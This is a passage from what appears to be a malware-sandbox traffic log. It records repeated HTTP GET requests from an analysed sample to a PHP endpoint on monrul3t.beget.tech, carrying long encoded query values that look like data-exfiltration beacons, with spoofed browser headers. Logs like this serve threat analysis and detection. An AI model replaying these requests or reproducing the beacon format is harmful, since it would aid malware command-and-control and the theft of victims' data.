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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dBp2T1kkaPpXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrpXTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJNTTq90MNp2T6lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJlHUp9maJd3ZEpVMRdkW3VERNlXVE9UNVJTWoJlMO1mQUpFNVdVW4VkMNNTTq5ENZ1mTwsGVNtGZE1EeJNETp1EWid2aU5UavpWS0cGVOlmWt1EMNpWWqZ1VNNTSy0UeRdkWyUkMZtmRq5EbSJjTsJVbalmTt5EbCpnTtJlaZtmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRl